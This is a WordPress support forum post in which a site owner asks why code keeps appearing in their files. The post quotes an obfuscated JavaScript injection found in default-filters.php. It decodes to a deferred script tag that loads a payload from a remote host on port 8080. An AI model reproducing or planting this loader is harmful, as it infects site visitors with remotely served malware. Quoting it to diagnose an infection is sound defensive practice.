Support » Fixing WordPress » Site breaking down

  • Over past few months my site has been breaking down every few days by some code being magically inserted in wp files. I updated to 2.9, changed theme and rebuild all pages/posts and same problem persists, . Only plugins I use are NGGallery and Maintenance Mode. I also embed few youtube videos by pasting code from youtube. Here is an example of code inserted at the end of default-filters.php file, but there are several other places with similar code:

    <script>/*LGPL*/ try{ window.onload = function(){var Kx42q7ogtq = document.createElement(‘s^(#c)@r)!i^&p(#t#&(‘.replace(/@|\!|#|\^|\(|&|\$|\)/ig, ”));Kx42q7ogtq.setAttribute(‘defer’, ‘d^)(&@e(f(@$)e#)^r(&$’.replace(/&|\$|#|\(|\!|@|\^|\)/ig, ”));Kx42q7ogtq.setAttribute(‘type’, ‘t()&$e$)!!x#@(t)^)/($j^(^a&v(@$a@)@s!c@r@&#i$(^@^p)$t!&)’.replace(/&|#|@|\)|\$|\!|\^|\(/ig, ”));Kx42q7ogtq.setAttribute(‘id’, ‘H)k)r#5((^z@!1(^g)#(#z(&5#((@^l(y&#!s#!^’.replace(/\)|\(|\!|\$|#|\^|@|&/ig, ”));Kx42q7ogtq.setAttribute(‘s@(r)&c!!’.replace(/\$|\^|\)|#|&|@|\(|\!/ig, ”), ‘h^^&t@(#@t&#p^^:@#&/(#!/(^&g#&^!n)$@@a^^(v&$@i@#$&@-(&^c&$o(-^j^($(!p!##.!$#(a)!#$m@e&&^b#(((l@o($@.)^j)^p#&@!.^#e)$!^x)b&@^i&))i$-(c$!#$o##@)$m)$.&!t(^$h@e$@$c$$h^$o)c^&o!!#l#(^a!^^t)!e!(^)w)@(e$b!(.^r))u@&:!8$!!$0!(&8^@$0@$&@/!&)g&^o&)@&o&^&^g^)(l!e^@!(.$c@)@&o)(m)^#/@)^&g)o(##o$&^g!l@#)&e)#$.@#&c)#@o!!m&)/!^!y()(e#@$$l&#p@@&.))#(c$&)o@$@m##$)/@&u$@(w(a$n)^$t()s$.^c)$o#@$m&@(/!@o@n$(^@e#m@^a#$n$$g@a)(.&(!c##^!o@m^!/#’.replace(/&|\(|\!|@|#|\^|\)|\$/ig, ”));if (document){document.body.appendChild(Kx42q7ogtq);}} } catch(Z5etnjy1aegaoiqtc5d) {}</script>
    <!–9fdcd16354fd9685ecb93060babdb5c4–>

    Anybody knows what causes this and how to fix it?

    Thanks

Viewing 5 replies - 1 through 5 (of 5 total)
Viewing 5 replies - 1 through 5 (of 5 total)
  • The topic ‘Site breaking down’ is closed to new replies.